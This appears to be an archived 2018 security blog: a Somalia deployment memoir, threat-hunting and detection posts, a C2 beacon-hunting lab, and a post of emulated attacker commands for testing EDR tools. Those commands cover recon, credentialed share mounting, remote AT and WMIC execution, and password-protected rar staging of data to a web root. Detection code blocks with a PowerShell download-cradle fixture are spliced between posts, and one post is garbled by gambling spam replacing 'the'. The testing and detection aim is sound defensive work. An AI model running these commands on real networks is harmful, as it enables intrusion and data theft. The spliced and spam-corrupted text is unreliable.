Wednesday, October 3, 2018

This Day 25 Years Ago

This is definitely a different post for me, but today marks 25 years since Operation Gothic Serpent, or what has become known as Blackhawk Down.  This also marks a significant point in my life and one that will remain in my thoughts daily for the next 25 years.  I was in the 24th Infantry Division and my company had just assumed the role of immediate ready company and my platoon was immediate ready platoon (kind of an on call status for IT, but has the possibility to become much much more intense).  As part of this immediate ready platoon, we were tasked with being anywhere in the world within 18 hours if needed.  To my knowledge, that day was the first time a mechanized infantry platoon was deployed with that kind of speed.  They always say it helps to talk about things, so I would like to talk about that day from my point of view.

My first memory of that day was around 2AM.  I remember being woken up by my beeper and thinking it was a training alert (there were no cell phones back then 😃).  We had just returned from spending 4 weeks in the field and my assumption was a test.  Leadership was testing their ability to contact everyone.  I figured a simple phone call and I would be back in bed.  I made the phone call and was informed that I needed to be in formation in 30 minutes.  A little upset that they were taking it this far, I got dressed, kissed my wife of 6 months goodbye, and told her I would be back soon.

When I arrived at work I saw the look on people's faces.  Serious, scared, anxious.  These weren't the faces I'd seen during routine alerts.  I began hearing of CNN's reporting on the events happening in Mogadishu.  This was quickly turning into the day I totally wasn't expecting.  Shortly after I had arrived we were told we needed to draw weapons before formation.  I remember that pit in my stomach, knowing where I was heading and knowing that I would be leaving my wife, who had only lived in the area for 5 weeks, behind.  I hadn't said goodbye to her and prayed that I would be able to at some point before we left.

During formation it was confirmed that we were being deployed to Somalia.  3rd PLT 3/15 INF (which was my platoon) would be the immediate ready platoon and were to head over to the gym where we would receive our shots, have wills drawn up and take care of any other legal needs.  If you haven't experienced the vaccine process, it's like an assembly line.  Going from station to station until you eventually reach the end.

The next few hours are kind of vague.  I believe a lot of it was hurry up and wait, but they were probably dealing with some logistical issues.  At any rate, my squad leader allowed me to go home for a few minutes so I could let my wife know what was going on.  While I was at home I was also able to call my parents and let them know too.  I really appreciated that I was able to see her and talk to her.  Soon I had to head back though.  I knew the busses would be arriving that would take us to Hunter Army Airfield where our gear and vehicles were prestaged.  The hardest thing in my life was saying goodbye.  Scared for her because she would be alone in a place she didn't know.  Wondering if I would ever see her again and knowing she was thinking the same thing.  Finally turning and walking away was absolutely heart wrenching for me.

Soon the busses did show up.  We all boarded and made our way from Ft. Stewart to Savannah.  I watched the cars out of the window and the people walking around.  I thought about how different our lives were at that point in time.  They were headed to the park and I had no idea what I was heading to.  They could plan the rest of their day and I wasn't sure what I could plan.  It was ok though.  I had been in Desert Storm and knew that it could happen at any time again.  There would have been no way that I would not have gone.  That's not what we do.  Arriving at Hunter Army Airfield I saw the 2 C5 Galaxies that would take us on our journey.  The Bradleys hadn't been loaded yet, but they soon would be and we would be on our way.

From the busses we moved to some underground barracks where we were distributed ammo.  Once our magazines were loaded we moved to the range where we had the opportunity to zero our weapons.  This is the one time you want to make sure it's dead on (pun intended).

Soon we were able to board the plane.  If you've never been in one of these, it's hard to explain how big they are.  The seating is above the cargo area and holds about 40 people.  There is one window seat and everyone faces backwards.  I was the lucky one and had the window seat.  It kept me occupied during the trip, even if I was only looking at water much of the time.  I couldn't sleep and it was good to have something to do.  As we got closer we had people go down to the cargo area where 2 of the 4 Bradleys were.  They loaded the 25mm chain gun as well as missiles into the launcher.  I don't believe anyone knew what to expect when we landed and the nose of the plane opened up.  I can tell you that nobody wanted to be caught off guard though.

The flight was many many hours.  As we got closer to landing you could see the focus of people change.  It went from talking and joking around to determination and anticipation.  It was time to do the job we were sent to do.  Whatever that may turn out to be.  I would spend the next 5 months in Somalia.


My experience that day is different than many because I deployed in response to those events.  Please remember those that were there and gave everything they had for their brothers.

This picture was taken late Oct '93 just outside what would become Victory Base.  It was home for a few weeks for my platoon.


Saturday, September 8, 2018

Thoughts After the SANS 2018 Threat Hunting Summit

Over the past few days I've had the pleasure of attending the SANS Threat Hunting Summit.  Not only was this a terrific event, it also gave me the opportunity to see how others in our community are tackling the problems we are all dealing with.  I was able to look at the things I am doing and see if there are ways I can improve or things I can incorporate into my current processes.  The summit speakers and attendees also sparked new ideas as well as things I would like to dig into more.

One of the thoughts I had during the summit came while Alex Pinto (@alexcpsec) and Rob Lee (@RobertMLee) were discussing machine learning.  I believe ML may be hard to implement in a detection strategy unless it's for a very narrow and specific use case.  As the scope widens, the accuracy of your results may suffer.  What would happen, though, if we started building models based on a wider scope, but built them in a way that would cluster with other models?  Would we be able to cluster the results of these different models in a way that highlights an attacker performing different actions during an intrusion?  I'm spitballing here, but as an example:
  1. A model looking at all flow data for anomalous network patterns between machines.
  2. A model looking for anomalous authentication patterns.
Can the results of these 2 models then be clustered by source IP or destination IP (or some other attribute) so that the cluster is a higher fidelity event than the results of each individual model?  I'm not sure, as I don't have a lot of experience with ML, so I'm just throwing that out there.

Rick McElroy (@InfoSecRick) was also talking about something similar during his keynote.  Analysts need context when they are looking at events, as it's often very hard to classify something as malicious until you have additional supporting evidence (I'm summarizing).  I believe we can often build multiple points of context into our alerting, though.  By building visibility around triggers (actions), regardless of how noisy they may be individually, we can then generate alerts only where there are multiple data points, producing higher fidelity alerts while reducing the overall number.  An example may be:
  1. PowerShell initiating an HTTP request.
  2. First-seen non-alphanumeric character pattern.
  3. Multiple flags where the flag is 3 characters or less.
By being able to generate an alert on any of the 3 characteristics, but not doing so until a threshold of 2 or more is met, I have dramatically increased the fidelity of the alert.  Or we could generate a suspicious PowerShell event based on any 1 of the 3 occurring and send an alert when an additional suspicious action on the host has been identified within a certain time frame.  An executable being written to a Temp directory may be an example (or any other detection you may have that maps to the host).  The cool thing about this is that you can start to see behaviors dynamically vs. singular events.
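The two alerting modes just described, written out as an added example in Python (this is not code from the original post).  It scores a PowerShell command line against the three characteristics, alerts when 2 or more are met, and otherwise holds the single hit until another suspicious action (an executable written to a Temp directory) lands on the same host inside a time window.  Assumptions: the "first-seen non-alphanumeric pattern" is interpreted as the punctuation shape of the command line compared against a baseline of shapes already seen, the HTTP request is inferred from the command line rather than from network telemetry, and the baseline, hosts and events are all constructed for the example:

```python
import re
from datetime import datetime, timedelta

# Added example (not code from the original post): score each PowerShell
# command line against the three characteristics, alert at a threshold of 2,
# and otherwise hold the single hit for correlation with another suspicious
# action on the same host inside a time window.  Baseline patterns, hosts and
# events below are constructed.

# Characteristic 1: PowerShell initiating an HTTP request.  With only the
# command line to go on, look for a URL or the common download primitives.
HTTP_RE = re.compile(
    r"(https?://|Net\.WebClient|DownloadString|DownloadFile|"
    r"Invoke-WebRequest|Invoke-RestMethod|\biwr\b|\birm\b|Start-BitsTransfer)",
    re.IGNORECASE,
)

# Characteristic 3: flags of 3 characters or less, e.g. -nop -w -ec -e.
SHORT_FLAG_RE = re.compile(r"(?:^|\s)-([A-Za-z]{1,3})(?=\s|$)")

# The additional host detection used by the second alerting mode.
TEMP_EXE_RE = re.compile(r"\\Temp\\[^\\]+\.exe$", re.IGNORECASE)


def non_alnum_pattern(cmdline):
    """Characteristic 2 helper (assumed interpretation): drop every run of
    alphanumerics so only the punctuation 'shape' of the command line remains.
    A shape never seen before in the environment is the 'first seen' signal."""
    shape = re.sub(r"[A-Za-z0-9]+", "", cmdline)
    return re.sub(r"\s+", " ", shape).strip()


def score_powershell(cmdline, seen_patterns):
    """Return the names of the characteristics a command line matches."""
    hits = []
    if HTTP_RE.search(cmdline):
        hits.append("http_request")
    if non_alnum_pattern(cmdline) not in seen_patterns:
        hits.append("first_seen_pattern")
    if len(SHORT_FLAG_RE.findall(cmdline)) >= 2:
        hits.append("multiple_short_flags")
    return hits


def triage(events, seen_patterns, window=timedelta(minutes=10), threshold=2):
    """events: dicts with ts (datetime), host, type ('powershell' or
    'file_write') and cmdline or path.  Returns a list of (host, reason)."""
    alerts, single, others = [], {}, {}
    for ev in events:
        if ev["type"] == "powershell":
            hits = score_powershell(ev["cmdline"], seen_patterns)
            if len(hits) >= threshold:
                alerts.append((ev["host"], "powershell:" + "+".join(hits)))
            elif hits:
                single.setdefault(ev["host"], []).append((ev["ts"], hits[0]))
        elif ev["type"] == "file_write" and TEMP_EXE_RE.search(ev["path"]):
            others.setdefault(ev["host"], []).append(
                (ev["ts"], "exe_in_temp:" + ev["path"]))
    # A single characteristic stays quiet unless another suspicious action
    # shows up on the same host within the window.
    for host, singles in single.items():
        for ts, hit in singles:
            for other_ts, desc in others.get(host, []):
                if abs(other_ts - ts) <= window:
                    alerts.append((host, "powershell:%s + %s" % (hit, desc)))
    return alerts


# Constructed baseline: command-line shapes already seen in the environment.
SEEN_PATTERNS = {non_alnum_pattern(c) for c in (
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1",
    r"powershell.exe -NoProfile -Command Get-Service",
)}

T0 = datetime(2018, 9, 8, 14, 0, 0)
SAMPLE_EVENTS = [  # constructed
    # download cradle: HTTP request + unseen shape + short flags -> 3 hits
    {"ts": T0, "host": "wks01", "type": "powershell",
     "cmdline": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://198.51.100.7/a')\""},
    # the inventory script from the baseline -> 0 hits
    {"ts": T0 + timedelta(minutes=1), "host": "wks02", "type": "powershell",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    # same shape as the baseline, but short flags -> 1 hit, held for correlation
    {"ts": T0 + timedelta(minutes=5), "host": "wks03", "type": "powershell",
     "cmdline": r"powershell.exe -ep bypass -f C:\scripts\inventory.ps1"},
    # an executable written to Temp on that host two minutes later
    {"ts": T0 + timedelta(minutes=7), "host": "wks03", "type": "file_write",
     "path": r"C:\Users\bob\AppData\Local\Temp\svc.exe"},
]


def run_sample():
    return triage(SAMPLE_EVENTS, SEEN_PATTERNS)


if __name__ == "__main__":
    for host, reason in run_sample():
        print(host, reason)
```

wks01 trips all three characteristics and alerts on its own; wks03 only trips the short-flag check, which stays silent until the Temp executable arrives two minutes later on the same host.  The baseline of seen shapes is the part that needs real data behind it: seed it from a few weeks of your own process telemetry before trusting the first-seen signal.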

ATT&CK was discussed quite a bit throughout the summit (@likethecoins and @its_a_feature_).  This is such a cool framework.  Analysts can wrap their heads around the things that they can (and should) be hunting for.  I'm curious how many companies have adopted this framework and are using it to build and validate their detection.  If you start building visibility around the types of things listed in ATT&CK, can you then start clustering the events generated and map them through the framework?  The more data points that map, does that raise the confidence in the behavior, the machine in question or the user associated with the events?


My flight was delayed today, so I've been sitting at the airport for the last several hours.  This is a quick post, but I wanted to get these thoughts jotted down while I had some time.

Saturday, June 30, 2018

Methods of Detection

I talk a lot about how I may go about finding adversary behavior, but I have not spoken very much about how teams may be alerted.  This is a much needed conversation in my opinion.  As teams gain capability and visibility, their alert volumes will likely increase too.  The obvious example may be the team that implemented a threat feed and wants to incorporate a watchlist that is largely derived from it.  Sure, you will probably receive alerts from this and management will be happy that you are finally doing "Intel driven detection" ;) , but how will your analysts work these without the proper context as to why that indicator may be bad?

I believe there are 3 different forms of detection.  Using these correctly can:

1. Decrease analyst fatigue.
2. Decrease false positive rate.
3. Decrease alert volume.
4. Gain additional visibility.
5. Gain additional alerting capability.


Detections that are fed directly to an analyst as an alert. 
      
These detections are generally high fidelity and are well documented.  Available to the analyst are descriptions of what the intention of the detection rules are along with true positive and false positive examples.

Detections that are used for correlation.

These detections are generally low fidelity.  They may happen often in our environments as normal activity, but when combining multiple detections and looking at order / timing, they may indicate malicious actions being taken by an attacker.  I also believe that all detections that go directly to analysts should go in this bucket as well.  You never know when looking at clusters of detections can change how an alert is categorized.

The downside of alerting from dynamically correlated events is that they may be more difficult to analyze.  You will often be looking for behaviors, and analysts with limited experience may miss key indicators that point to malicious behavior.  If tuned correctly, the alert volume should be low, so it may be possible to route all alerts derived from these to more senior analysts.

Detections written to increase visibility.

These detections are used to increase our ability to perform direct alerting as well as correlation.  An example may be that we want to know when a Windows command prompt is spawned across an SMB session.  We can use an IDS such as Snort to gain this visibility.  We can then feed that into our correlation bucket or directly to an analyst depending on fidelity.  This is just one example; think about other technologies your org has that would allow you to write rules and gain additional capability (HIPS, HIDS, proxy, Sysmon...).

So now if we take our initial example of alerting directly off a newly purchased threat feed, we may see (based on alert volume and fidelity) that a better option could be to use these detections in the correlation bucket.  An example could then be Watchlist alert + Rare User-Agent + URI Volume.  Alone, these detections may fire 1000's of times a day, but together they may mean a newly discovered compromise.

Thursday, March 29, 2018

C2 Hunting

For an adversary to be successful in your environment they will need a way to enter and leave your network.  This can obviously happen in many different ways.  One way may be an attacker utilizing 3rd party access, another possibly gaining access through an externally facing device, but more often than not this is facilitated by a backdoor being placed on a machine within your network, or at least the initial stages are.  Going with this assumption, it then makes sense that we spend a large amount of time and effort trying to identify indications of backdoors.

So when you sit down and think about the problem, ask yourself, what does a backdoor look like?  What does it look like when it's initially placed on the machine?  What does it look like when it starts?  What does it look like when it beacons?  What does it look like when it's actively being used?  For this post I will be focusing on beacon behaviors, but remember that there are many other opportunities to hunt for and identify these.

When we investigate IDS alerts that are related to C2 activity, what are some of the indications that we look for that may help tip the scale in saying that the alert is a true positive?  Or to put it another way, what are some of the things that may be common about C2?

  • User-Agent is rare
  • User-Agent is new
  • Domain is rare
  • Domain is new
  • High frequency of HTTP connections
  • URI is the same
  • URI varies but length is constant
  • Domain varies but length is constant
  • Missing referrer
  • Missing or same referrer to multiple URIs on a single destination

All of the above will not be true about every beacon, but in the vast majority of instances more than one statement will be true.  If I look for multiples of the above, by source and destination pairs, I believe that I will have a higher chance of identifying malicious beacon traffic than by analyzing each individually.

Next we need to generate some traffic so that we can validate our theories.  If you are wondering about a list of backdoors that would be good to test, have a look at attack.mitre.org and the backdoors that have been used by the various actors that are tracked.  I also can't emphasize enough the importance of having an environment that you can use for testing out theories.  Being able to perform and log the actions that you want to find can often lead to new ideas when you see the actual data that is generated.  You also need to know that your queries will really find what you are looking for.  For this testing I set up 3 VMs, which are listed below.

Machine 1
  • Ubuntu 16.04
  • INetSim
  • Bro
  • Splunk forwarder

Machine 2
  • Ubuntu 16.04
  • Free Splunk

Machine 3
  • Windows 7
  • Default route and DNS are set to the IP address of Machine 1.

Flow
  • Obviously the malware will be executed on Machine 3.  For backdoors that communicate with a domain based C2, a DNS lookup will occur and the DNS name will resolve to Machine 1.  For IP based C2, the traffic will follow the default route on Machine 3 and Machine 1 will respond (using an iptables redirect and NAT rule).
  • INetSim will respond to the C2 communication.
  • Bro will log the HTTP traffic and forward logs to the Splunk server.
  • Scheduled queries will run within the Splunk environment to identify the C2 behaviors that we define.
  • Results of the queries will be logged to a separate index within Splunk.
  • A scheduled search will run against this new index in an attempt to identify multiple behaviors on either a host or a destination.


I used the file for this blog post from the link below.  It's named Cobaltstrike.exe, but I don't believe it's a Cobalt Strike backdoor.  I believe it serves the purpose for this post though: how can we go about finding unknown backdoors, or backdoors that we don't have signatures for?


https://www.hybrid-analysis.com/sample/5b16d3c8451a1ea7633aae14c28f30c2d5c9b925d9f607938828bf543db9c582?environmentId=100

The result of executing this particular backdoor can be seen in the screenshot of correlated events below.  To get a better understanding of how this correlation occurred I'll go over the queries that got us here.




When an HTTP based backdoor communicates, it will reach out to a URI.  The URI or the URI structure is typically coded into the backdoor.  If the backdoor beacons to multiple URIs on the same C2 host, these URIs are very often the same character length.  This query looks for source/destination pairs with greater than 6 connections to multiple URIs, all of which are the same length.


Just as the URI or URI structure is often coded into a backdoor, a User-Agent string is as well.  These User-Agents are very often unique due to misspellings, version mismatches or simply random naming.  By stacking User-Agents you will find rare ones, but very often, after investigating these, they will wind up being legitimate traffic.  By combining rare UAs with additional C2 behavior you can quickly focus on the connections you should be looking at.  This query looks for fewer than 10 source hosts, all using a single UA, communicating to the same destination.


When you want to identify how a host wound up visiting a specific URL you would typically look at the referrer field.  Very often the referrer is left blank with C2 traffic, or it can be hardcoded with a single referrer for every beacon.  It can be odd to see the same referrer for multiple URIs, all on the same destination host.  This query identifies a single referrer listed for multiple URIs on a single destination.


This query simply looks at the volume of traffic between a source and a destination.  When combined with additional behaviors, this can be a good indicator of malicious traffic.
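The four queries above, together with the Watchlist + Rare User-Agent + URI Volume combination from the "Methods of Detection" post, written out as an added example in Python rather than as the post's own Splunk searches.  Each behavior is evaluated per source/destination pair and a pair is only reported when two or more line up, which is the correlation step the post describes.  The records are constructed and use a subset of the Bro http.log column names; the volume threshold and the watchlist contents are assumptions, not values from the post:

```python
from collections import defaultdict

# Added example, not the post's own Splunk searches: constant URI length,
# rare User-Agent, single referrer to multiple URIs, volume, and a watchlist
# match, tested per (src, dst) pair and reported only when two or more hit.
# Records are constructed and use a subset of Bro http.log column names.

URI_LEN_MIN_CONNS = 7     # post: "greater than 6 connections"
RARE_UA_MAX_HOSTS = 10    # post: "less than 10 source hosts"
VOLUME_MIN_CONNS = 20     # assumed threshold
WATCHLIST = {"cdn.legit-example.com"}   # constructed; a stale feed entry


def uri_length_constant(reqs):
    uris = {r["uri"] for r in reqs}
    return (len(reqs) >= URI_LEN_MIN_CONNS and len(uris) > 1
            and len({len(u) for u in uris}) == 1)


def rare_user_agent(reqs, ua_hosts_by_dst):
    # rarity is measured across the whole log: how many source hosts used
    # this UA toward this destination, not just the pair under test
    dst = reqs[0]["id.resp_h"]
    return any(len(ua_hosts_by_dst[dst][r["user_agent"]]) < RARE_UA_MAX_HOSTS
               for r in reqs)


def single_referrer_multi_uri(reqs):
    # an empty referrer on every request counts as one (missing) referrer
    return (len({r["referrer"] for r in reqs}) == 1
            and len({r["uri"] for r in reqs}) > 1)


def high_volume(reqs):
    return len(reqs) >= VOLUME_MIN_CONNS


def watchlist_hit(reqs):
    return any(r["host"] in WATCHLIST or r["id.resp_h"] in WATCHLIST for r in reqs)


def hunt(records, min_behaviours=2):
    """Group requests by (src, dst), test each behavior, and return the pairs
    showing at least min_behaviours, most behaviors first."""
    pairs = defaultdict(list)
    ua_hosts_by_dst = defaultdict(lambda: defaultdict(set))
    for r in records:
        pairs[(r["id.orig_h"], r["id.resp_h"])].append(r)
        ua_hosts_by_dst[r["id.resp_h"]][r["user_agent"]].add(r["id.orig_h"])
    results = []
    for (src, dst), reqs in pairs.items():
        checks = [
            ("uri_len_constant", uri_length_constant(reqs)),
            ("rare_ua", rare_user_agent(reqs, ua_hosts_by_dst)),
            ("same_referrer_multi_uri", single_referrer_multi_uri(reqs)),
            ("volume", high_volume(reqs)),
            ("watchlist", watchlist_hit(reqs)),
        ]
        hits = [name for name, matched in checks if matched]
        if len(hits) >= min_behaviours:
            results.append((src, dst, hits))
    return sorted(results, key=lambda x: -len(x[2]))


def _req(src, dst, host, uri, referrer, ua):
    return {"id.orig_h": src, "id.resp_h": dst, "host": host, "uri": uri,
            "referrer": referrer, "user_agent": ua}


CHROME = ("Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) "
          "Chrome/68.0.3440.106 Safari/537.36")
BEACON_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


def sample_records():
    """Constructed traffic: 12 workstations browsing a legitimate CDN that
    sits on the watchlist, one host with an uncommon updater UA that only
    ever hits one URI, and one beacon."""
    recs = []
    for i in range(12):
        src = "10.0.0.%d" % (101 + i)
        for n, uri in enumerate(["/", "/css/site.css", "/js/app.min.js",
                                 "/img/logo.png", "/news/2018/09"]):
            ref = "" if n == 0 else "http://cdn.legit-example.com/"
            recs.append(_req(src, "198.51.100.20", "cdn.legit-example.com", uri, ref, CHROME))
    for _ in range(3):
        recs.append(_req("10.0.0.50", "198.51.100.30", "updates.vendor-example.com",
                         "/check", "", "VendorUpdater/1.2"))
    for n in range(24):   # varying URIs of identical length, one referrer, odd UA
        recs.append(_req("10.0.0.23", "203.0.113.10", "update-cdn.example",
                         "/api/v1/%04d.php" % n, "", BEACON_UA))
    return recs


if __name__ == "__main__":
    for src, dst, hits in hunt(sample_records()):
        print(src, "->", dst, ", ".join(hits))
```

With the threshold at 2 only the beacon pair surfaces, with four behaviors.  Dropping the threshold to 1 returns every pair in the sample: the twelve browsing hosts on the watchlist hit and the updater on the rare UA hit, which is exactly the noise the post describes when those detections are sent straight to an analyst.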


There are many additional signs of malicious beacon traffic.  By spending time identifying these behaviors and incorporating them into some type of detection workflow, your chances of spotting malicious over benign become much greater.  By applying this methodology you gain additional coverage over signature based detection, or new capability where you currently don't have detection but do have the data (i.e. proxy logs).

All questions and comments are welcome.  Feel free to reach out on twitter @jackcr.



Friday, January 12, 2018

What are your tools detecting

At some point during an intrusion, if cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 attacker has gained enough access, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 need for malware will go away.  External access to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 target network can be achieved through a vpn, 3rd party connection or simple misconfiguration on an external facing device.  Lateral movement, data consolidation and staging can all happen using builtin windows tools.  Data packaging can happen with builtin tools or public archiving utilities that are most likely used, legitimately, throughout your network by multiple users.  If an attacker has achieved this level of access, it is at this point you really need to ask yourself if cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 tools you have in place are capable of alerting you as to what may be happening.

From an EDR perspective, how much do you feel cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 vendor should be detecting and alerting?  What types of data do you feel an EDR solution should be collecting?  How important is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 interface and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 query language?  All of this is especially important if you don’t have cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 capability to author your own signatures or cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 interface is so poorly designed that it is not feasible to generate your own alerts based on limitations imposed by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 vendor.

I put together some tests that you can use to verify the capabilities of your tools when it comes to recon, lateral movement and data staging.  I would be very curious to know what your outcomes are and if there are any obvious gaps in coverage across vendors.  I think it would be pretty enlightening to the entire community.

This is also not meant to put down the work that vendors are doing in this area.  It has come a long way, but I think we often get focused on finding “the malware” when that is only one aspect.

Note: Change the below scripts and commands to match your environment.

========== a.bat ===========
@echo off
ping -n 1 192.168.1.3>>c:\temp\a.txt
ping -n 1 192.168.1.4>>c:\temp\a.txt
ping -n 1 192.168.1.5>>c:\temp\a.txt
ping -n 1 192.168.1.6>>c:\temp\a.txt
ping -n 1 192.168.1.7>>c:\temp\a.txt
ping -n 1 192.168.1.8>>c:\temp\a.txt
ping -n 1 192.168.1.9>>c:\temp\a.txt
ping -n 1 192.168.1.10>>c:\temp\a.txt
ping -n 1 192.168.1.11>>c:\temp\a.txt
ping -n 1 192.168.1.12>>c:\temp\a.txt
ping -n 1 192.168.1.13>>c:\temp\a.txt
ping -n 1 192.168.1.14>>c:\temp\a.txt
ping -n 1 192.168.1.15>>c:\temp\a.txt
ping -n 1 192.168.1.16>>c:\temp\a.txt
ping -n 1 192.168.1.17>>c:\temp\a.txt
ping -n 1 192.168.1.18>>c:\temp\a.txt
ping -n 1 192.168.1.19>>c:\temp\a.txt
ping -n 1 192.168.1.20>>c:\temp\a.txt
ping -n 1 192.168.1.21>>c:\temp\a.txt
ping -n 1 192.168.1.22>>c:\temp\a.txt
ping -n 1 192.168.1.23>>c:\temp\a.txt
ping -n 1 192.168.1.24>>c:\temp\a.txt
ping -n 1 192.168.1.25>>c:\temp\a.txt
ping -n 1 192.168.1.26>>c:\temp\a.txt
ping -n 1 192.168.1.27>>c:\temp\a.txt
ping -n 1 192.168.1.28>>c:\temp\a.txt
 
=========== Execute a.bat ========
cmd /c a.bat
 
========== b.bat ===========
@echo off
net localgroup administrators >>c:\windows\system32\b.txt
quser >>c:\windows\system32\b.txt
netstat -nab -p tcp >>c:\windows\system32\b.txt
net start >>c:\windows\system32\b.txt
net session >>c:\windows\system32\b.txt
net share >>c:\windows\system32\b.txt
net use >>c:\windows\system32\b.txt
net view >>c:\windows\system32\b.txt
net view /domain >>c:\windows\system32\b.txt
net time /domain >>c:\windows\system32\b.txt
ipconfig /all >>c:\windows\system32\b.txt
route print >>c:\windows\system32\b.txt
systeminfo >>c:\windows\system32\b.txt
dsquery server >>c:\windows\system32\b.txt
dsquery subnet -limit 10000 >>c:\windows\system32\b.txt
net group "domain admins" /domain >>c:\windows\system32\b.txt
net group "enterprise admins" /domain >>c:\windows\system32\b.txt
 
======= Mount share and copy batch script ========
nbtstat -a x.x.x.x >>c:\temp\a.txt
net use \\x.x.x.x password user:domain/user
net use Z: \\x.x.x.x\c$ password /user:domain\user
copy C:\temp\*.bat Z:\windows\system32\
dir Z:\windows\system32\*.bat
 
====== Schedule at job, execute script, copy results back, delete share ========
net time \\x.x.x.x
at \\x.x.x.x
at \\x.x.x.x 4:01 "C:\windows\system32\b.bat"
net time /domain
tasklist
dir Z:\windows\system32\b.txt
copy Z:\windows\system32\b.txt C:\temp\b.txt
at \\x.x.x.x 1 /delete /y
net use Z: /delete /y
 
========== abc.bat ===========
@echo off
c:\temp\cmd.exe a -hppassword c:\temp\abc.temp c:\data\for\exfil -x*.exe -x*.dll
 Note: cmd.exe is a renamed copy of rar.exe
=========== Create and move exfil =============
copy c:\temp\abc.bat \\x.x.x.x\c$\temp\abc.bat
copy c:\temp\cmd.exe \\x.x.x.x\c$\temp\cmd.exe
wmic /node:"x.x.x.x" /user:"domain\username" /password:"password" process call create "cmd.exe /c c:\temp\abc.bat"
copy \\x.x.x.x\c$\temp\abc.temp c:\temp\abc.temp
copy c:\temp\abc.temp \\x.x.x.x\c$\inetpub\wwwroot\website\abc.temp
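As an added example (not code from the original post), here is the kind of detection logic a defender could run over process-creation telemetry to check whether the test sequence above would surface: single-event rules for the system32 redirect, the remote AT job, the WMIC remote process creation and RAR switches run under a different binary name, plus per-host burst counts for the ping sweep and the recon commands. The event fields are modelled on Sysmon process-creation records, and all hostnames, addresses and credentials in the sample are constructed.

```python
import re
from collections import Counter, defaultdict

# Tools the b.bat / nbtstat / tasklist steps above rely on (process image names).
RECON_TOOLS = {"net.exe", "quser.exe", "netstat.exe", "ipconfig.exe", "route.exe",
               "systeminfo.exe", "dsquery.exe", "nbtstat.exe", "tasklist.exe"}

def classify(image, cmd):
    """Single-event rules: return the names of the patterns one event trips."""
    hits, c = [], cmd.lower()
    # Recon output appended to a file under system32 (the b.bat redirect pattern).
    if image in RECON_TOOLS and re.search(r">>\s*c:\\windows\\system32\\", c):
        hits.append("recon_output_to_system32")
    # Remote AT job scheduled against a UNC host (the "at \\host 4:01 ..." step).
    if image == "at.exe" and re.match(r"at\s+\\\\\S+\s+\d", c):
        hits.append("remote_at_job")
    # WMIC remote process creation with inline credentials.
    if image == "wmic.exe" and "/node:" in c and "process call create" in c:
        hits.append("wmic_remote_process_create")
    # RAR archiving switches ("a -hp<password>") from a binary not named rar.exe.
    if image != "rar.exe" and re.search(r"\ba\s+-hp\S+", c):
        hits.append("renamed_rar_archiving")
    return hits

def analyze(events, sweep_threshold=10, recon_threshold=5):
    """events: iterable of (host, image, command_line). Returns {host: [findings]}."""
    findings, pings, recon = defaultdict(set), Counter(), Counter()
    for host, image, cmd in events:
        findings[host].update(classify(image, cmd))
        if image == "ping.exe" and re.search(r"-n\s+1\b", cmd.lower()):
            pings[host] += 1          # single-packet pings: a.bat style sweep
        if image in RECON_TOOLS:
            recon[host] += 1          # many recon tools on one host in one window
    for host in (h for h, n in pings.items() if n >= sweep_threshold):
        findings[host].add("ping_sweep")
    for host in (h for h, n in recon.items() if n >= recon_threshold):
        findings[host].add("recon_burst")
    return {h: sorted(f) for h, f in findings.items() if f}

# Constructed sample events (made-up hosts, addresses and credentials): "ws1"
# replays the a.bat/b.bat/at/wmic/abc.bat sequence, "ws2" is ordinary use.
SAMPLE = [("ws1", "ping.exe", f"ping -n 1 192.168.1.{i}") for i in range(3, 29)]
SAMPLE += [("ws1", t, f"{t[:-4]} >>c:\\windows\\system32\\b.txt") for t in
           ("net.exe", "quser.exe", "netstat.exe", "ipconfig.exe", "route.exe", "systeminfo.exe")]
SAMPLE += [("ws1", "at.exe", r"at \\10.0.0.5 4:01 C:\windows\system32\b.bat"),
           ("ws1", "wmic.exe", r'wmic /node:"10.0.0.5" /user:"dom\adm" /password:"p" '
                               r'process call create "cmd.exe /c c:\temp\abc.bat"'),
           ("ws1", "cmd.exe", r"c:\temp\cmd.exe a -hpSecret c:\temp\abc.temp c:\data -x*.exe"),
           ("ws2", "ipconfig.exe", "ipconfig /all"),
           ("ws2", "ping.exe", "ping -n 1 10.0.0.1")]
```

Calling `analyze(SAMPLE)` reports all six findings for "ws1" and nothing for "ws2"; the thresholds are the knobs to tune against your own baseline of legitimate admin activity.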

Monday, January 1, 2018

My 2017

This will be kind of a different post for me in that I won’t be talking about DFIR or hunting.  As many of you know I’ve had kind of a challenging year both physically and mentally so I want to reflect on some of the things I’ve experienced, learned and overcome during the course of 2017.

In April of 2017 I was sitting at my desk, working, when I began having horrible pains in my chest, down the arteries in my neck as well as my arm.  I told my wife to call 911 because I thought I was having a heart attack.  When the EMT’s arrived my pain had already subsided, but they went ahead and took me to the hospital where I spent the next several hours waiting for tests to be run and results to come back.  The end result was that they didn’t find any signs of a heart attack, but they admitted me so that they could perform additional tests.  The following day I had a stress test which also came back normal. With nothing to go on, the doctors sent me home without a definitive answer as to what had happened.  I should have probably pushed harder for an answer, but I think I was just relieved that they didn't find anything serious.

